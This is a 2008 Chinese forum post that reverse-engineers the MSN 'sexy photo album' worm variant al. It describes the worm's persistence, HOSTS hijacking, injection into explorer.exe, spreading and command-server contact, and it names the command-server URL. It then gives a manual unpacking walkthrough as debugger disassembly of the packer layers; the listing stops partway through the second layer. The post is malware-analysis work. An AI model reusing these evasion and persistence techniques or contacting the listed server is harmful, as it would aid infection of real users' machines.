-
-
[原创]蠕虫病毒"MSN性感相册"变种al的反汇编逆向分析资料(带手动脱壳部分)
-
发表于: 2008-6-13 21:41 7033
-
////////////////////////////////////////////////////////////////////////////////////////////////////
文章名称:蠕虫病毒"MSN性感相册"变种al的反汇编逆向分析资料(带手动脱壳部分)
文章类型:病毒反汇编逆向分析
编写作者:Coderui
编写日期:2008年06月13日
作者博客:http://hi.baidu.com/coderui
////////////////////////////////////////////////////////////////////////////////////////////////////
****************************************************************************************************
----------------------------------------------------------------------------------------------------
病毒功能简述:
病毒名称:Worm/MSN.SendPhoto.al
中 文 名:“性感相册”变种al
病毒长度:23040 字节
病毒类型:蠕虫
危险级别:★★
影响平台:Win 9X/ME/NT/2000/XP/2003
病毒描述:
Worm/MSN.SendPhoto.al“性感相册”变种al是蠕虫家族的最新成员之一,采用高级语言编写,并经过添加多层保护壳处理。“性感相册”变种al运行后,会自我复制到被感染计算机系统的“%SystemRoot%\system32\”目录下,并重新命名为“waccs.exe”(文件属性设置为:系统、隐藏、只读)。“性感相册”变种al会在被感染计算机的后台强行篡改用户系统中的HOSTS文件,利用域名映像劫持技术禁止用户访问与安全相关的网站。“性感相册”变种al在运行时,采用进程隐藏技术使自身的进程运行后不显示,这样可以使用户很难发现该病毒的存在。“性感相册”变种al在运行时,会在被感染计算机的后台将恶意可执行代码注入到系统桌面程序“explorer.exe”进程内存的空间中,并调用执行[其中,所注入的恶意代码的功能是:1、以共享方式打开"%SystemRoot%\system32\waccs.exe"文件,防止用户删除该病毒主程序文件。2、建立互斥量“t3x0”,利用进程守护技术原理,用系统“explorer.exe”进程来保护病毒主程序进程不被关闭(循环监视病毒主程序进程是否被关闭,如果发现被关闭则重新调用运行)。]。“性感相册”变种al会在被感染计算机系统的后台利用“E-MAIL”邮件和“MSN”等聊天工具进行群发恶意广告信息,可能还会利用“E-MAIL”邮件和“MSN”等聊天工具进行自我传播。“性感相册”变种al在运行时,会在被感染计算机系统的后台不段循环与骇客指定远程服务器(其中,通信地址为:“http://www.secure.freebsd.la”)进行秘密数据通信,接收从骇客服务器返回的数据包,根据包中骇客定义好的“指令”执行相应的恶意操作。“性感相册”变种al会通过在注册表启动项中添加新键的方式,来实现开机蠕虫病毒自启动。
----------------------------------------------------------------------------------------------------
一、手动脱壳部分(三层壳:UPX + 未知壳 + 压缩壳.):
第一层:UPX
0041D100 > 60 PUSHAD ; 第一层UPX壳入口处.[F8]向下走一步.
0041D101 BE 00804100 MOV ESI,misfotos.00418000 ; 根据"ESP守恒定律",利用命令"HR ESP"下硬件断点,[F9]运行.
0041D106 8DBE 0090FEFF LEA EDI,DWORD PTR DS:[ESI+FFFE9000]
0041D10C 57 PUSH EDI
0041D10D 83CD FF OR EBP,FFFFFFFF
0041D110 EB 10 JMP SHORT misfotos.0041D122
.
.
.
0041D24B 8D4424 80 LEA EAX,DWORD PTR SS:[ESP-80] ; 运行后停在这里.利用命令"HD"删除硬件断点.
0041D24F 6A 00 PUSH 0
0041D251 39C4 CMP ESP,EAX
0041D253 ^ 75 FA JNZ SHORT misfotos.0041D24F
0041D255 83EC 80 SUB ESP,-80
0041D258 - E9 EB44FEFF JMP misfotos.00401748 ; 这里是关键跳转,[F4]运行到这里,再[F8]一次,就到了下一个壳的OEP入口.
----------------------------------------------------------------------------------------------------
第二层:未知壳
00401748 68 A0000000 PUSH 0A0 ; 第二层未知壳入口处.[F8]向下一直走.
0040174D FF15 AA914100 CALL DWORD PTR DS:[4191AA] ; GDI32.GetTextCharset
00401753 2315 10FE4000 AND EDX,DWORD PTR DS:[40FE10]
00401759 B8 D5D4C5E4 MOV EAX,E4C5D4D5
0040175E BA 8AF84694 MOV EDX,9446F88A
00401763 68 00000000 PUSH 0
00401768 FF15 F2914100 CALL DWORD PTR DS:[4191F2] ; GDI32.GetObjectType
0040176E 330D F0FF4000 XOR ECX,DWORD PTR DS:[40FFF0]
00401774 2915 B0F84000 SUB DWORD PTR DS:[40F8B0],EDX
0040177A B9 FE6FDB94 MOV ECX,94DB6FFE
0040177F 60 PUSHAD
00401780 68 78000000 PUSH 78
00401785 FF15 AA914100 CALL DWORD PTR DS:[4191AA] ; GDI32.GetTextCharset
0040178B B8 99B0188D MOV EAX,8D18B099
00401790 23CA AND ECX,EDX
00401792 C1D2 13 RCL EDX,13
00401795 68 5A000000 PUSH 5A
0040179A FF15 CE914100 CALL DWORD PTR DS:[4191CE] ; GDI32.GetTextColor
004017A0 B8 F52BFF3B MOV EAX,3BFF2BF5
004017A5 0BC1 OR EAX,ECX
004017A7 E9 0C000000 JMP misfotos.004017B8
004017AC 81DA 41B3616E SBB EDX,6E61B341
004017B2 81E1 02074014 AND ECX,14400702
004017B8 68 F0000000 PUSH 0F0
004017BD FF15 AA914100 CALL DWORD PTR DS:[4191AA] ; GDI32.GetTextCharset
004017C3 C1C2 14 ROL EDX,14
004017C6 2BC1 SUB EAX,ECX
004017C8 1315 80FC4000 ADC EDX,DWORD PTR DS:[40FC80]
004017CE 6A 40 PUSH 40
004017D0 68 78000000 PUSH 78
004017D5 FF15 DA914100 CALL DWORD PTR DS:[4191DA] ; GDI32.GetStockObject
004017DB 13C8 ADC ECX,EAX
004017DD B8 8EC095D3 MOV EAX,D395C08E
004017E2 E9 0A000000 JMP misfotos.004017F1
004017E7 2BC1 SUB EAX,ECX
004017E9 C1D9 13 RCR ECX,13
004017EC BA DA3D088C MOV EDX,8C083DDA
004017F1 68 5A000000 PUSH 5A
004017F6 FF15 AA914100 CALL DWORD PTR DS:[4191AA] ; GDI32.GetTextCharset
004017FC C1D0 17 RCL EAX,17
004017FF 1BD1 SBB EDX,ECX
00401801 E9 0B000000 JMP misfotos.00401811
00401806 B9 D9B0C767 MOV ECX,67C7B0D9
0040180B 0115 D0FF4000 ADD DWORD PTR DS:[40FFD0],EDX
00401811 68 00100000 PUSH 1000
00401816 68 82000000 PUSH 82
0040181B FF15 F2914100 CALL DWORD PTR DS:[4191F2] ; GDI32.GetObjectType
00401821 23C1 AND EAX,ECX
00401823 81CA 3592BBAE OR EDX,AEBB9235
00401829 1905 10F94000 SBB DWORD PTR DS:[40F910],EAX
0040182F 68 46000000 PUSH 46
00401834 FF15 CE914100 CALL DWORD PTR DS:[4191CE] ; GDI32.GetTextColor
0040183A C1F1 1C SAL ECX,1C
0040183D B8 56BE5D76 MOV EAX,765DBE56
00401842 E9 0C000000 JMP misfotos.00401853
00401847 81D1 C57C94A5 ADC ECX,A5947CC5
0040184D 40 INC EAX
0040184E BA F96C60E2 MOV EDX,E2606CF9
00401853 68 6E000000 PUSH 6E
00401858 FF15 DA914100 CALL DWORD PTR DS:[4191DA] ; GDI32.GetStockObject
0040185E 03C8 ADD ECX,EAX
00401860 81C2 41CE4169 ADD EDX,6941CE41
00401866 3BC8 CMP ECX,EAX
00401868 79 0F JNS SHORT misfotos.00401879
0040186A 330D A0FF4000 XOR ECX,DWORD PTR DS:[40FFA0]
00401870 C1D8 02 RCR EAX,2
00401873 210D B0FA4000 AND DWORD PTR DS:[40FAB0],ECX
00401879 C1D8 07 RCR EAX,7
0040187C 81CA B22C5ABB OR EDX,BB5A2CB2
00401882 1BD1 SBB EDX,ECX
00401884 68 14000000 PUSH 14
00401889 FF15 CE914100 CALL DWORD PTR DS:[4191CE] ; GDI32.GetTextColor
0040188F 310D F0F84000 XOR DWORD PTR DS:[40F8F0],ECX
00401895 81C2 610C3949 ADD EDX,49390C61
0040189B 1B05 A0FE4000 SBB EAX,DWORD PTR DS:[40FEA0]
004018A1 3BC8 CMP ECX,EAX
004018A3 76 0C JBE SHORT misfotos.004018B1
004018A5 81E1 29B246CB AND ECX,CB46B229
004018AB 81DA C19BC3A4 SBB EDX,A4C39BC1
004018B1 C1C0 06 ROL EAX,6
004018B4 0315 A0F84000 ADD EDX,DWORD PTR DS:[40F8A0]
004018BA 2105 50F94000 AND DWORD PTR DS:[40F950],EAX
004018C0 68 E8240000 PUSH 24E8
004018C5 68 14000000 PUSH 14
004018CA FF15 DA914100 CALL DWORD PTR DS:[4191DA] ; GDI32.GetStockObject
004018D0 3115 20FD4000 XOR DWORD PTR DS:[40FD20],EDX
004018D6 81D1 FE912D27 ADC ECX,272D91FE
004018DC 68 78000000 PUSH 78
004018E1 FF15 CE914100 CALL DWORD PTR DS:[4191CE] ; GDI32.GetTextColor
004018E7 2B05 20F84000 SUB EAX,DWORD PTR DS:[40F820]
004018ED 0BC2 OR EAX,EDX
004018EF BA E1B9BFBE MOV EDX,BEBFB9E1
004018F4 81FA F5118A80 CMP EDX,808A11F5
004018FA 75 11 JNZ SHORT misfotos.0040190D
004018FC B8 3EC66BBE MOV EAX,BE6BC63E
00401901 81C9 41E9FB10 OR ECX,10FBE941
00401907 2905 B0F84000 SUB DWORD PTR DS:[40F8B0],EAX
0040190D B9 09053E33 MOV ECX,333E0509
00401912 BA A1807B32 MOV EDX,327B80A1
00401917 1B05 70FD4000 SBB EAX,DWORD PTR DS:[40FD70]
0040191D 68 28000000 PUSH 28
00401922 FF15 F2914100 CALL DWORD PTR DS:[4191F2] ; GDI32.GetObjectType
00401928 C1C9 1E ROR ECX,1E
0040192B 0105 D0FA4000 ADD DWORD PTR DS:[40FAD0],EAX
00401931 E9 0D000000 JMP misfotos.00401943
00401936 B9 B16624FB MOV ECX,FB2466B1
0040193B 1915 00FD4000 SBB DWORD PTR DS:[40FD00],EDX
00401941 13D1 ADC EDX,ECX
00401943 6A 00 PUSH 0
00401945 68 F0000000 PUSH 0F0
0040194A FF15 DA914100 CALL DWORD PTR DS:[4191DA] ; GDI32.GetStockObject
00401950 1105 90FF4000 ADC DWORD PTR DS:[40FF90],EAX
00401956 BA FAFEEA35 MOV EDX,35EAFEFA
0040195B 3BC1 CMP EAX,ECX
0040195D 79 09 JNS SHORT misfotos.00401968
0040195F 42 INC EDX
00401960 2B05 20FF4000 SUB EAX,DWORD PTR DS:[40FF20]
00401966 2BCA SUB ECX,EDX
00401968 3305 50FC4000 XOR EAX,DWORD PTR DS:[40FC50]
0040196E B9 FEA2EB76 MOV ECX,76EBA2FE
00401973 68 64000000 PUSH 64
00401978 FF15 F2914100 CALL DWORD PTR DS:[4191F2] ; GDI32.GetObjectType
0040197E 13C8 ADC ECX,EAX
00401980 33CA XOR ECX,EDX
00401982 81C1 9D3A4307 ADD ECX,7433A9D
00401988 E9 0C000000 JMP misfotos.00401999
0040198D 81C2 EA541683 ADD EDX,831654EA
00401993 81D1 72147E2A ADC ECX,2A7E1472
00401999 68 3C000000 PUSH 3C
0040199E FF15 AA914100 CALL DWORD PTR DS:[4191AA] ; GDI32.GetTextCharset
004019A4 3315 E0FA4000 XOR EDX,DWORD PTR DS:[40FAE0]
004019AA 81C1 2DF6770C ADD ECX,0C77F62D
004019B0 81E9 A1DB420D SUB ECX,0D42DBA1
004019B6 3B05 64FD4000 CMP EAX,DWORD PTR DS:[40FD64]
004019BC 7E 04 JLE SHORT misfotos.004019C2
004019BE C1F2 09 SAL EDX,9
004019C1 41 INC ECX
004019C2 1105 C0FD4000 ADC DWORD PTR DS:[40FDC0],EAX
004019C8 2315 B0FD4000 AND EDX,DWORD PTR DS:[40FDB0]
004019CE FF15 4E924100 CALL DWORD PTR DS:[41924E] ; kernel32.VirtualAlloc
004019D4 8BF0 MOV ESI,EAX
004019D6 68 46000000 PUSH 46
004019DB FF15 DA914100 CALL DWORD PTR DS:[4191DA] ; GDI32.GetStockObject
004019E1 81D1 E665EAFA ADC ECX,FAEA65E6
004019E7 3105 40FA4000 XOR DWORD PTR DS:[40FA40],EAX
004019ED 3BCA CMP ECX,EDX
004019EF 79 08 JNS SHORT misfotos.004019F9
004019F1 0BD1 OR EDX,ECX
004019F3 B9 D5A0E402 MOV ECX,2E4A0D5
004019F8 40 INC EAX
004019F9 0915 F0FE4000 OR DWORD PTR DS:[40FEF0],EDX
004019FF 0BD0 OR EDX,EAX
00401A01 68 32000000 PUSH 32
00401A06 FF15 AA914100 CALL DWORD PTR DS:[4191AA] ; GDI32.GetTextCharset
00401A0C 0BC8 OR ECX,EAX
00401A0E 0BC8 OR ECX,EAX
00401A10 3B15 40FE4000 CMP EDX,DWORD PTR DS:[40FE40]
00401A16 71 0E JNO SHORT misfotos.00401A26
00401A18 1905 30F94000 SBB DWORD PTR DS:[40F930],EAX
00401A1E BA 9DDD9596 MOV EDX,9695DD9D
00401A23 C1E9 1E SHR ECX,1E
00401A26 B8 3EE8BC94 MOV EAX,94BCE83E
00401A2B 81C1 861A3829 ADD ECX,29381A86
00401A31 81E9 F15DE68A SUB ECX,8AE65DF1
00401A37 56 PUSH ESI
00401A38 68 00000000 PUSH 0
00401A3D FF15 F2914100 CALL DWORD PTR DS:[4191F2] ; GDI32.GetObjectType
00401A43 0115 90FA4000 ADD DWORD PTR DS:[40FA90],EDX
00401A49 81E1 B524DB34 AND ECX,34DB24B5
00401A4F BA 2A9C114C MOV EDX,4C119C2A
00401A54 3B05 EAFE4000 CMP EAX,DWORD PTR DS:[40FEEA]
00401A5A 79 0F JNS SHORT misfotos.00401A6B
00401A5C C1D1 1C RCL ECX,1C
00401A5F 81C9 B1DCFAD0 OR ECX,D0FADCB1
00401A65 81D2 D2D09685 ADC EDX,8596D0D2
00401A6B C1E8 16 SHR EAX,16
00401A6E 1BCA SBB ECX,EDX
00401A70 68 00000000 PUSH 0
00401A75 68 FA000000 PUSH 0FA
00401A7A FF15 A2914100 CALL DWORD PTR DS:[4191A2] ; GDI32.GetMetaRgn
00401A80 81CA 16FA2657 OR EDX,5726FA16
00401A86 0905 E0FF4000 OR DWORD PTR DS:[40FFE0],EAX
00401A8C 3B15 EAFE4000 CMP EDX,DWORD PTR DS:[40FEEA]
00401A92 76 0B JBE SHORT misfotos.00401A9F
00401A94 B9 395EFC83 MOV ECX,83FC5E39
00401A99 0B15 D0F94000 OR EDX,DWORD PTR DS:[40F9D0]
00401A9F 81C1 65825161 ADD ECX,61518265
00401AA5 C1E0 07 SHL EAX,7
00401AA8 C1EA 0B SHR EDX,0B
00401AAB 68 64000000 PUSH 64
00401AB0 FF15 F2914100 CALL DWORD PTR DS:[4191F2] ; GDI32.GetObjectType
00401AB6 B8 F918B92E MOV EAX,2EB918F9
00401ABB 1BC2 SBB EAX,EDX
00401ABD E9 0B000000 JMP misfotos.00401ACD
00401AC2 B9 869B3EB7 MOV ECX,B73E9B86
00401AC7 1B05 F0FE4000 SBB EAX,DWORD PTR DS:[40FEF0]
00401ACD BB 60124000 MOV EBX,misfotos.00401260
00401AD2 68 96000000 PUSH 96
00401AD7 FF15 DA914100 CALL DWORD PTR DS:[4191DA] ; GDI32.GetStockObject
00401ADD C1EA 05 SHR EDX,5
00401AE0 290D C0FD4000 SUB DWORD PTR DS:[40FDC0],ECX
00401AE6 3BD1 CMP EDX,ECX
00401AE8 7E 08 JLE SHORT misfotos.00401AF2
00401AEA BA C66B979C MOV EDX,9C976BC6
00401AEF C1C1 11 ROL ECX,11
00401AF2 03CA ADD ECX,EDX
00401AF4 3315 10FB4000 XOR EDX,DWORD PTR DS:[40FB10]
00401AFA 2BD1 SUB EDX,ECX
00401AFC 68 6E000000 PUSH 6E
00401B01 FF15 F2914100 CALL DWORD PTR DS:[4191F2] ; GDI32.GetObjectType
00401B07 0305 20FE4000 ADD EAX,DWORD PTR DS:[40FE20]
00401B0D B9 A5000ABB MOV ECX,BB0A00A5
00401B12 03C2 ADD EAX,EDX
00401B14 68 14000000 PUSH 14
00401B19 FF15 DA914100 CALL DWORD PTR DS:[4191DA] ; GDI32.GetStockObject
00401B1F 3315 90FC4000 XOR EDX,DWORD PTR DS:[40FC90]
00401B25 23D1 AND EDX,ECX
00401B27 68 A0000000 PUSH 0A0
00401B2C FF15 CE914100 CALL DWORD PTR DS:[4191CE] ; GDI32.GetTextColor
00401B32 B9 AAD1A3A8 MOV ECX,A8A3D1AA
00401B37 40 INC EAX
00401B38 81FA 3A9082CD CMP EDX,CD82903A
00401B3E 7A 07 JPE SHORT misfotos.00401B47
00401B40 0BD1 OR EDX,ECX
00401B42 B8 524E36FD MOV EAX,FD364E52
00401B47 B9 5A47DD0D MOV ECX,0DDD475A
00401B4C C1D2 10 RCL EDX,10
00401B4F FF33 PUSH DWORD PTR DS:[EBX]
00401B51 68 3C000000 PUSH 3C
00401B56 FF15 F2914100 CALL DWORD PTR DS:[4191F2] ; GDI32.GetObjectType
00401B5C 2B0D D0FF4000 SUB ECX,DWORD PTR DS:[40FFD0]
00401B62 81CA 02BDDE9F OR EDX,9FDEBD02
00401B68 81F9 2D7FA92C CMP ECX,2CA97F2D
00401B6E 7D 0A JGE SHORT misfotos.00401B7A
00401B70 C1C2 1D ROL EDX,1D
00401B73 23D0 AND EDX,EAX
00401B75 B8 B6B34935 MOV EAX,3549B3B6
00401B7A 03D1 ADD EDX,ECX
00401B7C B9 C66C3771 MOV ECX,71376CC6
00401B81 68 B4000000 PUSH 0B4
00401B86 FF15 CE914100 CALL DWORD PTR DS:[4191CE] ; GDI32.GetTextColor
00401B8C 81C9 4AE9DD0F OR ECX,0FDDE94A
00401B92 23C2 AND EAX,EDX
00401B94 C1E2 18 SHL EDX,18
00401B97 8F06 POP DWORD PTR DS:[ESI]
00401B99 68 F0000000 PUSH 0F0
00401B9E FF15 DA914100 CALL DWORD PTR DS:[4191DA] ; GDI32.GetStockObject
00401BA4 81D2 A513B20F ADC EDX,0FB213A5
00401BAA 81EA D9325608 SUB EDX,85632D9
00401BB0 3B0D 58FA4000 CMP ECX,DWORD PTR DS:[40FA58]
00401BB6 71 0E JNO SHORT misfotos.00401BC6
00401BB8 1105 00FC4000 ADC DWORD PTR DS:[40FC00],EAX
00401BBE 2B0D E0F84000 SUB ECX,DWORD PTR DS:[40F8E0]
00401BC4 13C2 ADC EAX,EDX
00401BC6 2B15 C0FE4000 SUB EDX,DWORD PTR DS:[40FEC0]
00401BCC B9 46AD58D4 MOV ECX,D458AD46
00401BD1 68 3C000000 PUSH 3C
00401BD6 FF15 AA914100 CALL DWORD PTR DS:[4191AA] ; GDI32.GetTextCharset
00401BDC 81D2 560493C0 ADC EDX,C0930456
00401BE2 2B05 50FC4000 SUB EAX,DWORD PTR DS:[40FC50]
00401BE8 B9 66C9A1A9 MOV ECX,A9A1C966
00401BED 8136 838221BB XOR DWORD PTR DS:[ESI],BB218283
00401BF3 68 F0000000 PUSH 0F0
00401BF8 FF15 F2914100 CALL DWORD PTR DS:[4191F2] ; GDI32.GetObjectType
00401BFE C1C0 0A ROL EAX,0A
00401C01 1915 00FC4000 SBB DWORD PTR DS:[40FC00],EDX
00401C07 1BC8 SBB ECX,EAX
00401C09 81FA F18ED7B1 CMP EDX,B1D78EF1
00401C0F 71 0D JNO SHORT misfotos.00401C1E
00401C11 13D0 ADC EDX,EAX
00401C13 B8 9AB6D2C1 MOV EAX,C1D2B69A
00401C18 81D9 22BB5FB5 SBB ECX,B55FBB22
00401C1E C1C8 11 ROR EAX,11
00401C21 03D1 ADD EDX,ECX
00401C23 68 8C000000 PUSH 8C
00401C28 FF15 AA914100 CALL DWORD PTR DS:[4191AA] ; GDI32.GetTextCharset
00401C2E 0B05 00FE4000 OR EAX,DWORD PTR DS:[40FE00]
00401C34 81D9 C9CE2159 SBB ECX,5921CEC9
00401C3A 68 5A000000 PUSH 5A
00401C3F FF15 F2914100 CALL DWORD PTR DS:[4191F2] ; GDI32.GetObjectType
00401C45 2BC2 SUB EAX,EDX
00401C47 1B0D 60FB4000 SBB ECX,DWORD PTR DS:[40FB60]
00401C4D E9 0F000000 JMP misfotos.00401C61
00401C52 1B05 30FB4000 SBB EAX,DWORD PTR DS:[40FB30]
00401C58 C1C2 04 ROL EDX,4
00401C5B 81C1 1206B1A2 ADD ECX,A2B10612
00401C61 8106 410E9B09 ADD DWORD PTR DS:[ESI],99B0E41
00401C67 68 14000000 PUSH 14
00401C6C 68 E6000000 PUSH 0E6
00401C71 FF15 A2914100 CALL DWORD PTR DS:[4191A2] ; GDI32.GetMetaRgn
00401C77 81DA D197286B SBB EDX,6B2897D1
00401C7D 81C1 E9767E1F ADD ECX,1F7E76E9
00401C83 E9 0B000000 JMP misfotos.00401C93
00401C88 B8 3A429A7D MOV EAX,7D9A423A
00401C8D 1315 20FD4000 ADC EDX,DWORD PTR DS:[40FD20]
00401C93 68 C8000000 PUSH 0C8
00401C98 FF15 DA914100 CALL DWORD PTR DS:[4191DA] ; GDI32.GetStockObject
00401C9E C1D8 05 RCR EAX,5
00401CA1 BA 5A7944FA MOV EDX,FA44795A
00401CA6 3B0D 26FF4000 CMP ECX,DWORD PTR DS:[40FF26]
00401CAC 72 09 JB SHORT misfotos.00401CB7
00401CAE C1DA 02 RCR EDX,2
00401CB1 210D 70FA4000 AND DWORD PTR DS:[40FA70],ECX
00401CB7 1BD0 SBB EDX,EAX
00401CB9 B9 5E1AF8E0 MOV ECX,E0F81A5E
00401CBE 68 A0000000 PUSH 0A0
00401CC3 FF15 CE914100 CALL DWORD PTR DS:[4191CE] ; GDI32.GetTextColor
00401CC9 81DA B9742043 SBB EDX,432074B9
00401CCF C1E1 06 SHL ECX,6
00401CD2 E9 0B000000 JMP misfotos.00401CE2
00401CD7 81D1 0122DAA3 ADC ECX,A3DA2201
00401CDD BA 8E48FDE4 MOV EDX,E4FD488E
00401CE2 81C3 1151EC60 ADD EBX,60EC5111
00401CE8 68 D2000000 PUSH 0D2
00401CED FF15 F2914100 CALL DWORD PTR DS:[4191F2] ; GDI32.GetObjectType
00401CF3 C1E9 13 SHR ECX,13
00401CF6 81EA DA05CDAB SUB EDX,ABCD05DA
00401CFC E9 0D000000 JMP misfotos.00401D0E
00401D01 B9 75BDE543 MOV ECX,43E5BD75
00401D06 BA 4D8AE267 MOV EDX,67E28A4D
00401D0B C1C8 03 ROR EAX,3
00401D0E 68 FA000000 PUSH 0FA
00401D13 68 C8000000 PUSH 0C8
00401D18 FF15 A2914100 CALL DWORD PTR DS:[4191A2] ; GDI32.GetMetaRgn
00401D1E BA 167E846E MOV EDX,6E847E16
00401D23 C1C8 03 ROR EAX,3
00401D26 3B15 74FC4000 CMP EDX,DWORD PTR DS:[40FC74]
00401D2C 76 0C JBE SHORT misfotos.00401D3A
00401D2E 1905 C0FE4000 SBB DWORD PTR DS:[40FEC0],EAX
00401D34 1B15 E0F84000 SBB EDX,DWORD PTR DS:[40F8E0]
00401D3A B8 E9C146FE MOV EAX,FE46C1E9
00401D3F 1B15 B0F84000 SBB EDX,DWORD PTR DS:[40F8B0]
00401D45 1B05 50FB4000 SBB EAX,DWORD PTR DS:[40FB50]
00401D4B 81C3 F3AE139F ADD EBX,9F13AEF3
00401D51 68 28000000 PUSH 28
00401D56 FF15 AA914100 CALL DWORD PTR DS:[4191AA] ; GDI32.GetTextCharset
00401D5C C1D9 0B RCR ECX,0B
00401D5F 81C1 F9C4B1D6 ADD ECX,D6B1C4F9
00401D65 1915 80FD4000 SBB DWORD PTR DS:[40FD80],EDX
00401D6B 68 A0000000 PUSH 0A0
00401D70 FF15 F2914100 CALL DWORD PTR DS:[4191F2] ; GDI32.GetObjectType
00401D76 23D1 AND EDX,ECX
00401D78 0305 20FC4000 ADD EAX,DWORD PTR DS:[40FC20]
00401D7E C1DA 13 RCR EDX,13
00401D81 3B0D 6CFF4000 CMP ECX,DWORD PTR DS:[40FF6C]
00401D87 71 0E JNO SHORT misfotos.00401D97
00401D89 C1D2 1A RCL EDX,1A
00401D8C 81E2 8DCC5475 AND EDX,7554CC8D
00401D92 B8 BAC7C622 MOV EAX,22C6C7BA
00401D97 C1FA 12 SAR EDX,12
00401D9A C1C1 08 ROL ECX,8
00401D9D 81C6 6AED2E2F ADD ESI,2F2EED6A
00401DA3 68 E6000000 PUSH 0E6
00401DA8 FF15 DA914100 CALL DWORD PTR DS:[4191DA] ; GDI32.GetStockObject
00401DAE 1B05 50F94000 SBB EAX,DWORD PTR DS:[40F950]
00401DB4 B9 6AA78799 MOV ECX,9987A76A
00401DB9 81FA F23E3F93 CMP EDX,933F3EF2
00401DBF 72 07 JB SHORT misfotos.00401DC8
00401DC1 23D0 AND EDX,EAX
00401DC3 B9 16DFEE35 MOV ECX,35EEDF16
00401DC8 81C1 12580249 ADD ECX,49025812
00401DCE 13C2 ADC EAX,EDX
00401DD0 68 C8000000 PUSH 0C8
00401DD5 68 0A000000 PUSH 0A
00401DDA FF15 A2914100 CALL DWORD PTR DS:[4191A2] ; GDI32.GetMetaRgn
00401DE0 81D2 46B0111A ADC EDX,1A11B046
00401DE6 B9 3DCFF281 MOV ECX,81F2CF3D
00401DEB B8 950F5EFE MOV EAX,FE5E0F95
00401DF0 81FA CA307D84 CMP EDX,847D30CA
00401DF6 7A 08 JPE SHORT misfotos.00401E00
00401DF8 1105 00FC4000 ADC DWORD PTR DS:[40FC00],EAX
00401DFE 1BC2 SBB EAX,EDX
00401E00 1BD1 SBB EDX,ECX
00401E02 C1F9 18 SAR ECX,18
00401E05 68 3C000000 PUSH 3C
00401E0A FF15 DA914100 CALL DWORD PTR DS:[4191DA] ; GDI32.GetStockObject
00401E10 0BC8 OR ECX,EAX
00401E12 1BD0 SBB EDX,EAX
00401E14 0305 80FA4000 ADD EAX,DWORD PTR DS:[40FA80]
00401E1A 81C6 9A12D1D0 ADD ESI,D0D1129A
00401E20 81FB 48174000 CMP EBX,misfotos.00401748
00401E26 ^ 0F85 A6FCFFFF JNZ misfotos.00401AD2 ; 这里的向上回跳不要跳,我们直接执行到下一行的代码处,因为这里是循环.
00401E2C 68 50000000 PUSH 50 ; [F4]运行到这里,继续[F8]向下一直走.
00401E31 68 8C000000 PUSH 8C
00401E36 FF15 A2914100 CALL DWORD PTR DS:[4191A2] ; GDI32.GetMetaRgn
00401E3C 13D1 ADC EDX,ECX
00401E3E C1C8 1B ROR EAX,1B
00401E41 BA B13EEE10 MOV EDX,10EE3EB1
00401E46 81F9 9E40C622 CMP ECX,22C6409E
00401E4C 7E 0B JLE SHORT misfotos.00401E59
00401E4E 3305 50FB4000 XOR EAX,DWORD PTR DS:[40FB50]
00401E54 B9 79450E10 MOV ECX,100E4579
00401E59 3305 50FB4000 XOR EAX,DWORD PTR DS:[40FB50]
00401E5F B9 C18E4B4F MOV ECX,4F4B8EC1
00401E64 23D0 AND EDX,EAX
00401E66 68 14000000 PUSH 14
00401E6B FF15 DA914100 CALL DWORD PTR DS:[4191DA] ; GDI32.GetStockObject
00401E71 0905 60FF4000 OR DWORD PTR DS:[40FF60],EAX
00401E77 03C1 ADD EAX,ECX
00401E79 E9 0C000000 JMP misfotos.00401E8A
00401E7E C1E1 08 SHL ECX,8
00401E81 0B05 90FB4000 OR EAX,DWORD PTR DS:[40FB90]
00401E87 C1CA 0C ROR EDX,0C
00401E8A 68 BE000000 PUSH 0BE
00401E8F FF15 F2914100 CALL DWORD PTR DS:[4191F2] ; GDI32.GetObjectType
00401E95 C1E1 1A SHL ECX,1A
00401E98 BA 66CD8033 MOV EDX,3380CD66
00401E9D 5B POP EBX
00401E9E 68 F0000000 PUSH 0F0
00401EA3 FF15 CE914100 CALL DWORD PTR DS:[4191CE] ; GDI32.GetTextColor
00401EA9 48 DEC EAX
00401EAA BA A97A171B MOV EDX,1B177AA9
00401EAF 81EA FD9A1BC0 SUB EDX,C01B9AFD
00401EB5 81F9 02AAC65E CMP ECX,5EC6AA02
00401EBB 72 08 JB SHORT misfotos.00401EC5
00401EBD C1F0 11 SAL EAX,11
00401EC0 B9 853F21A6 MOV ECX,A6213F85
00401EC5 C1F0 02 SAL EAX,2
00401EC8 BA B5C941E2 MOV EDX,E241C9B5
00401ECD 03D1 ADD EDX,ECX
00401ECF 68 AA000000 PUSH 0AA
00401ED4 68 BE000000 PUSH 0BE
00401ED9 FF15 A2914100 CALL DWORD PTR DS:[4191A2] ; GDI32.GetMetaRgn
00401EDF 81C1 428C77DA ADD ECX,DA778C42
00401EE5 2915 20FD4000 SUB DWORD PTR DS:[40FD20],EDX
00401EEB FFD3 CALL EBX ; 到这里后千万不要按[F8]去步过执行,那么会跑飞的.应该按[F7]进去,里边是下一个壳的OEP入口.
00401EED 68 3C000000 PUSH 3C
00401EF2 FF15 F2914100 CALL DWORD PTR DS:[4191F2] ; GDI32.GetObjectType
00401EF8 03C1 ADD EAX,ECX
00401EFA C1C2 13 ROL EDX,13
00401EFD C1E8 18 SHR EAX,18
00401F00 E9 10000000 JMP misfotos.00401F15
00401F05 1315 A0FB4000 ADC EDX,DWORD PTR DS:[40FBA0]
00401F0B B9 824E7AB1 MOV ECX,B17A4E82
00401F10 B8 8AA4C975 MOV EAX,75C9A48A
00401F15 68 82000000 PUSH 82
00401F1A FF15 CE914100 CALL DWORD PTR DS:[4191CE] ; GDI32.GetTextColor
00401F20 190D 20FC4000 SBB DWORD PTR DS:[40FC20],ECX
00401F26 C1EA 0B SHR EDX,0B
00401F29 130D C0FD4000 ADC ECX,DWORD PTR DS:[40FDC0]
00401F2F E9 10000000 JMP misfotos.00401F44
00401F34 B8 6587CF97 MOV EAX,97CF8765
00401F39 81C1 0E541C99 ADD ECX,991C540E
00401F3F B8 957536C9 MOV EAX,C9367595
00401F44 61 POPAD
00401F45 68 64000000 PUSH 64
00401F4A FF15 F2914100 CALL DWORD PTR DS:[4191F2] ; GDI32.GetObjectType
00401F50 81D2 E1473A10 ADC EDX,103A47E1
00401F56 C1C1 02 ROL ECX,2
00401F59 C1D2 01 RCL EDX,1
00401F5C 3BC8 CMP ECX,EAX
00401F5E 76 07 JBE SHORT misfotos.00401F67
00401F60 BA 4E40CC04 MOV EDX,4CC404E
00401F65 23C8 AND ECX,EAX
00401F67 1915 40FE4000 SBB DWORD PTR DS:[40FE40],EDX
